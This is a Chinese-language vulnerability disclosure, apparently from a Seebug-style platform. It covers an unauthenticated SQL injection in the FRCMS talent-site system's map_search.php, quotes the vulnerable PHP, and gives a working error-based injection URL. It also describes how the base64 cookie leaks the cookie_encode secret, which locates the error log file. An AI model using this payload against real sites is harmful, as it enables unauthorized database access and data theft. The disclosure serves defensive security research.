### 简要描述: 无需登录,直接出数据 ### 详细说明: 看到search\map_search.php ``` if($act=='showmap'){ if($point){ $points=explode(',',$point); var_dump($points); if(count($points)<4){echo "alert('数据异常,载入失败!');";exit();} echo "$(\".map_loading\").hide(); map.clearOverlays();\r\n"; $sql="select a.m_id,a.m_name,a.m_regdate,a.m_workers,a.m_ecoclass,a.m_trade,b.m_map from {$cfg['tb_pre']}member a INNER JOIN {$cfg['tb_pre']}member_map b ON a.m_id=b.m_mid WHERE a.m_flag=1 AND $points[0]<SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1) AND SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1)<$points[1] AND $points[2]<SUBSTRING_INDEX(b.m_map,',',-1) AND SUBSTRING_INDEX(b.m_map,',',-1)<$points[3] $sqladd order by a.m_id desc"; $counts = $db->counter("`{$cfg['tb_pre']}member` a INNER JOIN {$cfg['tb_pre']}member_map b ON a.m_id=b.m_mid","a.m_flag=1 AND $points[0]<SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1) AND SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1)<$points[1] AND $points[2]<SUBSTRING_INDEX(b.m_map,',',-1) AND SUBSTRING_INDEX(b.m_map,',',-1)<$points[3] $sqladd"); $page= isset($_GET['page'])?$_GET['page']:1;//默认页码 $getpageinfo = page($page,$counts,"",20,5); $sql.=$getpageinfo['sqllimit']; $query=$db->query($sql);$i=0;$showinfolist=$showinfotip=''; while($row=$db->fetch_array($query)){ $maps=explode(':',$row['m_map']); if(count($maps)>1){ $map=$maps[1];$i++; echo "var point$i = new BMap.Point($map); var myIcon = new BMap.Icon('{$cfg[siteurl]}{$cfg[path]}images/map/n$i.png', new BMap.Size(21,28)); var marker$i = new BMap.Marker(point$i, {icon:myIcon}); map.addOverlay(marker$i); var infoWindow$i = new BMap.InfoWindow(\"载入中...\",{width:420,height:180}); marker$i.addEventListener(\"click\", function(){ map.openInfoWindow(infoWindow$i,new BMap.Point($map)); }); infoWindow$i.addEventListener(\"open\", function(){ if (infoWindow$i.getContent()=='载入中...'){ var htmhead='<p class=\"maplayername\"><a href=\"".formatlink('company','company',$row['m_regdate'],$row['m_id'])."\" 
target=\"_blank\">{$row["m_name"]}</a> <b>规模:</b>{$row["m_workers"]} <b>性质:</b>{$row["m_ecoclass"]} <b>行业:</b>{$row["m_trade"]}</p>'; var htmend=''; $.get(\"$cfg[path]inc/getinfo.php\",{id: {$row[m_id]}, s: 4, hn: 20, hl: 8},function(data){ infoWindow$i.setContent(htmhead+data+htmend) }); } });\r\n"; $showinfolist.="<li><img src=\"$cfg[path]images/map/nb$i.png\" align=\"absmiddle\" > <a id=\"a$i\" target=\"_blank\" href=\"".formatlink('company','company',$row['m_regdate'],$row['m_id'])."\">".sub_cnstrs($row["m_name"],16)."</a></li>"; $showinfotip.="$('#showinfolist li a[id=\"a$i\"]').unbind().mouseover(function(){map.openInfoWindow(infoWindow$i,new BMap.Point($map));});\r\n"; } } echo "$(\"#showinfolist\").html('$showinfolist');\r\n"; echo $showinfotip; } exit(); } ``` 其中$points未加单引号直接进入sql中,根据嘉缘人才系统的伪全局变量注册机制,我们直接可以注入。但是这个注入点是通过逗号来做分隔符的,并且count要大于4,所以我们构造如下exp ``` http://127.0.0.1/frcms/search/map_search.php?act=showmap&point=1=1 or char(@`'`) or EXP(~(select * from (select user())a))%23,aaa,aaa,aaaa,aaaaaa ``` [<img src="https://images.seebug.org/upload/201506/19224207a5a36fc6bcb20de5ea80469f4a3ecc40.png" alt="QQ截图20150619223944.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/19224207a5a36fc6bcb20de5ea80469f4a3ecc40.png) 发现mysql报错了,这cms会把错误记录到一个文件里面。如下代码实现 ``` function log_write($message, $type = 'php') { global $cfg, $fr_time, $username; $userip = getip(); $fr_time or $fr_time = time(); $user = $username ? $username : 'guest'; dir_create(DATA_ROOT.'/log/'); $log_file = DATA_ROOT.'/log/'.$type.'_'.md5($cfg['cookie_encode']).'.txt'; $log = date('Y-m-d H:i:s', $fr_time)."||$userip||$user||".$_SERVER['SCRIPT_NAME']."||".str_replace('&', '&', $_SERVER['QUERY_STRING'])."||$message\r\n"; $olog=file_get_contents($log_file); fputs(fopen($log_file,"w"), $log.$olog); } 主要是要获取到$cfg['cookie_encode']这个值,然后就可以找到这个文件了 function _setcookie($var, $value = '', $time = 0) { global $cfg, $fr_time; $time = $time > 0 ? 
$fr_time+$time : (empty($value) ? $fr_time - 3600 : 0); $port = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; $var = $cfg['cookie_pre'].$var;$value&&$value=base64_encode($value.$cfg['cookie_encode']); return setcookie($var, $value, $time, $cfg['cookie_path'], $cfg['cookie_domain'], $port); } ``` 可见 cookie 值只是把 `$cfg['cookie_encode']` 直接拼接后做 base64 编码,既未加密也未签名,这个本应保密的配置值因此随 cookie 下发到了客户端;而日志文件名又是由同一个值的 md5 派生的,所以据此即可确定日志文件的位置。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201506/192243187691188a798ac5430774ca5234243e90.png" alt="QQ截图20150619224103.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/192243187691188a798ac5430774ca5234243e90.png)